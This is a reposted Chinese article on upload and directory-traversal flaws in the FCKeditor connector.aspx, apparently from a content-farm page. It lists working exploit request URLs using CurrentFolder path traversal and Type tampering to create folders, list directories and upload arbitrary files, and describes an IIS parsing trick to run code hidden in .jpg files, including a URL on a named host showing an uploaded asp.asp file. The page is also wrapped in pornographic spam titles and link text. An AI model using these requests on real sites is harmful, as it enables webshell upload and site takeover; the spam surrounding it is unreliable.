麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 開發 > 綜合 > 正文

網頁編輯器FCKeditor 新聞組件的一些程序漏洞

2024-07-21 02:53:29
字體:
來源:轉載
供稿:網友
很多網站可能都在用FCK的新聞編輯組件,使用FCK的時候一定要注意版本是否安全,以下是FCK中的文件上傳漏洞:(主要是:connector.aspx文件的漏洞)
 
1 CurrentFolder 參數,可以在網站中不同目錄新建文件夾,參數使用 ../../來篡改參數,進入不同的目錄 
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp 


2 CurrentFolder 參數,根據返回的XML信息可以查看網站所有的目錄,比如 “../../../”進入不同的目錄,讓后通過XML返回的消息就可以看到沒有權限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F 

3 上傳文件時,通過修改CurrentFolder參數,可以將文件上傳到不同的目錄 
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F 

4 同時修改Type 和CurrentFolder 參數,可以上傳任意類型文件到網站任意目錄,基本上網站就完蛋了。 
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F 

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp 



5 通過創建文件夾的功能,創建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執行。

注:相關教程知識閱讀請移步到編輯器頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 高清在线国产 | 亚洲欧洲日产v特级毛片 | 91久久国产露脸精品国产 | 色综合久久久久久久久久久 | 久久蜜臀一区二区三区av | 97风流梦电影| 国产免费观看a大片的网站 欧美成人一级 | 一级全毛片 | 欧美18videos性处按摩 | 国产一级毛片在线看 | 蜜桃91丨九色丨蝌蚪91桃色 | 国产一级小视频 | 国产精品一区在线免费观看 | 亚洲av一级毛片特黄大片 | 午夜视频久久久 | 久久久久久艹 | 欧美不卡三区 | 正在播放91 | 欧美韩国日本在线 | 亚洲精品一区国产精品丝瓜 | 欧美亚州 | 13一14毛片免费看 | av中文字幕免费在线观看 | 高潮激情aaaaa免费看 | 欧美视频在线一区二区三区 | 免费人成在线观看网站 | 一区二区三区日韩在线观看 | 亚洲尻逼视频 | 羞羞视频免费观看网站 | 欧美激情图区 | 精品国产一级毛片 | 在线免费观看毛片 | 国产精品久久久久久久久久三级 | 懂色av懂色aⅴ精彩av | 亚洲国产精品久久久久婷婷老年 | 亚洲国产精品久久久久制服红楼梦 | 欧美一级无毛 | 久草在线视频中文 | 精品国产一区在线 | 黄色成人在线 | 久久精品1区2区 |